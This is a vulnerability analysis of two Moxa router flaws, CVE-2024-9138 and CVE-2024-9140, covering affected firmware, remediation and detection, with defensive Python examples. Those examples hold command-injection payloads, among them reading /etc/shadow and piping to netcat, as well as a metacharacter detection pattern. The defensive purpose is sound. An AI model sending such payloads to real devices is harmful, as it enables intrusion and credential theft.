Full Report
Taiwan-based Moxa has warned of two security vulnerabilities impacting its cellular routers, secure routers, and network security appliances that could allow privilege escalation and command execution. The list of vulnerabilities is as follows - CVE-2024-9138 (CVSS 4.0 score: 8.6) - A hard-coded credentials vulnerability that could allow an authenticated user to escalate privileges and gain
Analysis Summary
# Vulnerability: Moxa Cellular and Secure Routers Vulnerabilities Leading to Privilege Escalation and Command Injection
## CVE Details
- CVE ID: CVE-2024-9138
- CVSS 4.0 Score: 8.6 (High)
- CWE: CWE-798, Use of Hard-coded Credentials
- CVE ID: CVE-2024-9140
- CVSS 4.0 Score: 9.3 (Critical)
- CWE: CWE-78, OS Command Injection (special characters in input fields bypass the existing input restrictions and reach the operating system shell)
## Affected Systems
- Products: Moxa EDR-810 Series, EDR-8010 Series, EDR-G902 Series, EDR-G903 Series, EDR-G9004 Series, EDR-G9010 Series, EDF-G1002-BP Series, NAT-102 Series, OnCell G4302-LTE4 Series, TN-4900 Series.
- Versions:
- **CVE-2024-9138:** Firmware version 5.12.37 and earlier (EDR-810), 3.13.1 and earlier (EDR-8010, EDR-G9004, EDR-G9010, EDF-G1002-BP, TN-4900), 5.7.25 and earlier (EDR-G902), 3.13 and earlier (OnCell G4302-LTE4).
- **CVE-2024-9140:** Firmware version 3.13.1 and earlier (EDR-8010, EDR-G9004, EDR-G9010, EDF-G1002-BP), 1.0.5 and earlier (NAT-102), 3.13 and earlier (OnCell G4302-LTE4, TN-4900).
- Configurations: CVE-2024-9138 requires an authenticated user; any valid account on the device is the starting point. The summary does not state whether CVE-2024-9140 requires authentication or which interface carries the injectable input, so treat every input path into the management interface as in scope until the advisory's details are confirmed.
## Vulnerability Description
**CVE-2024-9138 (Hard-Coded Credentials):** The affected firmware ships with hard-coded credentials. An attacker who already holds any valid account on the device can use them to escalate to root, which means full system compromise: unauthorized configuration changes, exposure of stored data (including other credentials and VPN material), or disruption of the service the device provides.
**CVE-2024-9140 (OS Command Injection):** Input fields are filtered for special characters, but the filtering is incomplete: characters or sequences it does not cover still reach an operating system shell, so the attacker can terminate or extend the intended command. Successful exploitation gives remote execution of arbitrary operating system commands on the device. This is the typical failure mode of denylist filtering; the robust fix is allowlist validation of the value and passing it to the program without a shell.
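The following is an added example, not Moxa's code and not the vulnerable code from the advisory. It shows the two patterns side by side: a denylist of "special characters" that lets command substitution, `&&` and newlines through (the class of bypass CVE-2024-9140 describes), and an allowlist validator whose output goes into an argv list so no shell ever parses it. The ping diagnostic, the denylist contents and the payload list are all constructed for the demonstration.

```python
import ipaddress
import re

# Constructed denylist of "special characters". Deliberately incomplete,
# which is the failure mode the advisory describes; it is not Moxa's filter.
DENYLIST = (";", "|", ">", "<")


def weak_filter(value: str) -> bool:
    """Vulnerable check: True if no denylisted character is present."""
    return not any(ch in value for ch in DENYLIST)


def build_shell_command_unsafe(host: str) -> str:
    """Vulnerable pattern: filtered input is still interpolated into a shell string.
    /bin/sh would expand $(...), `...`, && and newlines that the denylist ignores."""
    if not weak_filter(host):
        raise ValueError("rejected by denylist")
    return f"ping -c 1 {host}"


# Allowlist for a DNS-style hostname: alphanumerics, dots and hyphens, no leading
# or trailing hyphen (a leading '-' could be parsed as an option by the program).
HOST_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?")


def validate_host(value: str) -> str:
    """Hardened check: accept an IP literal or a hostname, reject everything else."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if HOST_RE.fullmatch(value):
        return value
    raise ValueError(f"invalid host: {value!r}")


def build_argv_safe(host: str) -> list[str]:
    """Hardened pattern: the validated value is one argv element.
    Run it with subprocess.run(argv) (shell=False); no shell sees the string."""
    return ["ping", "-c", "1", validate_host(host)]


def passes_allowlist(value: str) -> bool:
    try:
        validate_host(value)
        return True
    except ValueError:
        return False


# Constructed injection payloads, each a 'host' value an attacker might submit.
INJECTION_PAYLOADS = [
    "8.8.8.8; cat /etc/shadow",     # ';' is denylisted: caught
    "8.8.8.8 | nc 10.0.0.1 4444",   # '|' is denylisted: caught
    "8.8.8.8 $(cat /etc/shadow)",   # command substitution: slips through
    "8.8.8.8 `id`",                 # backtick substitution: slips through
    "8.8.8.8 && id",                # '&' is not denylisted: slips through
    "8.8.8.8\nid",                  # newline separates commands: slips through
]


def audit(check) -> list[str]:
    """Return the payloads that a given check lets through."""
    return [p for p in INJECTION_PAYLOADS if check(p)]


if __name__ == "__main__":
    print("weak filter lets through:", audit(weak_filter))
    print("allowlist lets through:", audit(passes_allowlist))
    print("safe argv:", build_argv_safe("example.com"))
```

The point of `audit` is that four of the six payloads contain none of the denylisted characters, so the filter's existence tells you nothing about safety; only the combination of a positive allowlist and no shell removes the injection surface.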
## Exploitation
- Status: Neither the advisory nor this summary reports in-the-wild exploitation. Both flaws sit on network-edge and OT devices that are commonly reachable from less trusted networks, so treat them as high priority regardless.
- Complexity: **CVE-2024-9138** is post-authentication: the attacker needs a valid account of any privilege level, then uses the hard-coded credentials to reach root. **CVE-2024-9140** needs only the ability to submit a crafted value to the affected input field; because the existing filtering is what fails, no special timing or race condition is involved.
- Attack Vector: The summary does not reproduce the CVSS vectors. The management interfaces of these devices are network services, so plan for CVE-2024-9140 as a network-reachable command injection. For CVE-2024-9138 the precondition is an authenticated session, whatever network path delivers it; an attacker who obtains any low-privileged account remotely can chain directly into root.
## Impact
- Confidentiality: High (Root access allows data exposure/theft)
- Integrity: High (Configuration modification, command execution)
- Availability: High (Service disruption possible through command execution)
## Remediation
### Patches
Users must upgrade firmware to the specified versions:
- Upgrade each affected series to the fixed firmware listed in the advisory for that product line. For the product lines on the 3.x firmware train (EDR-8010, EDR-G9004, EDR-G9010, EDF-G1002-BP, OnCell G4302-LTE4, TN-4900) the fixed release is **3.14 or later**. The EDR-810 (5.12.x), EDR-G902 and EDR-G903 (5.7.x) and NAT-102 (1.0.x) lines are on different version trains, so "3.14" does not apply to them; take the minimum fixed version for those series from the advisory itself.
### Workarounds
The summary lists no vendor workaround, so patching is the primary action. Until a device is patched, reduce exposure: do not expose the management interface to the Internet, firewall it to a small set of administrative hosts on a dedicated management segment, and disable unused services. Because CVE-2024-9138 turns any authenticated account into root, treat every existing account as an admin account: prune unused ones, rotate passwords, and review who holds credentials.
## Detection
- Indicators of compromise: logins followed by root-level activity from accounts that should not have it, commands executed on the device that no administrator issued, unexpected configuration changes (new accounts, changed firewall or VPN settings, altered routing), and outbound connections the device does not normally make.
- Detection methods and tools: IPS/IDS rules on the management-interface traffic that flag parameter values containing shell metacharacters (`;`, `|`, `&`, backticks, `$(`, newlines) after URL decoding, since the injection relies on characters the device's own filter does not catch; review of the device's system and authentication logs for privilege escalation and for administrative actions outside change windows; and, on the network side, alerting on new outbound connections from the device, which is the usual follow-on to command execution.
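An added example of the log-side detection described above, not a tool from the advisory: it parses a few constructed access-log lines in the common combined-log layout, URL-decodes the query parameters of requests to the management interface, and flags values carrying shell metacharacters. The `/cgi-bin/diag` path, the `host` parameter and the log lines are all constructed for the demonstration; substitute the paths and log format of the device or proxy you actually collect from.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in a generic combined-log style. The /cgi-bin/diag
# path and the 'host' parameter are hypothetical, not Moxa's real endpoints.
SAMPLE_LOG = """\
10.0.0.5 - admin [06/Jan/2025:10:01:02 +0000] "GET /cgi-bin/diag?host=192.168.1.1 HTTP/1.1" 200 512
10.0.0.5 - admin [06/Jan/2025:10:01:09 +0000] "GET /cgi-bin/diag?host=192.168.1.1%24%28id%29 HTTP/1.1" 200 731
10.0.0.7 - - [06/Jan/2025:10:02:11 +0000] "GET /cgi-bin/diag?host=1.1.1.1%3Bcat%20/etc/shadow HTTP/1.1" 200 2048
10.0.0.9 - user [06/Jan/2025:10:03:30 +0000] "GET /index.html HTTP/1.1" 200 4096
10.0.0.7 - - [06/Jan/2025:10:04:00 +0000] "POST /cgi-bin/diag?host=1.1.1.1%0Aid HTTP/1.1" 200 600
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \d+$'
)

# Shell metacharacters that turn one argument into several commands or a
# substitution. Matched after URL decoding, so %3B, %24%28 and %0A are caught.
META_RE = re.compile(r"[;|&`$<>\n\r]")

# Path prefixes of the device management interface to watch (hypothetical).
MGMT_PREFIXES = ("/cgi-bin/",)


def find_injection_attempts(log_text: str) -> list[dict]:
    """Return one finding per decoded parameter value that carries a metacharacter."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a line in the expected layout; skip rather than guess
        parts = urlsplit(m.group("target"))
        if not parts.path.startswith(MGMT_PREFIXES):
            continue
        # parse_qsl percent-decodes, so the check sees what the device's parser saw.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if META_RE.search(value):
                findings.append({
                    "ts": m.group("ts"), "src": m.group("src"), "user": m.group("user"),
                    "path": parts.path, "param": name, "value": value,
                    "status": int(m.group("status")),
                })
    return findings


def sources_to_block(findings: list[dict]) -> list[str]:
    """Distinct source addresses in first-seen order, for a firewall rule or SOAR action."""
    return list(dict.fromkeys(f["src"] for f in findings))


if __name__ == "__main__":
    hits = find_injection_attempts(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ts']} {f['src']} user={f['user']} {f['path']} {f['param']}={f['value']!r}")
    print("block:", sources_to_block(hits))
```

Two caveats when running this for real: a 200 response does not confirm the injection worked, so pair a hit with the device's own logs and configuration diff; and POST bodies are not in an access log, so the same check has to run on a proxy or IDS that captures request bodies, otherwise the POST line above would only be caught because its payload happens to sit in the query string.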
## References
- Vendor advisory: Moxa MPSA-241155, "Privilege Escalation and OS Command Injection Vulnerabilities in Cellular Routers, Secure Routers, and Network Security Appliances": https://www.moxa.com/en/support/product-support/security-advisory/mpsa-241155-privilege-escalation-and-os-command-injection-vulnerabilities-in-cellular-routers,-secure-routers,-and-netwo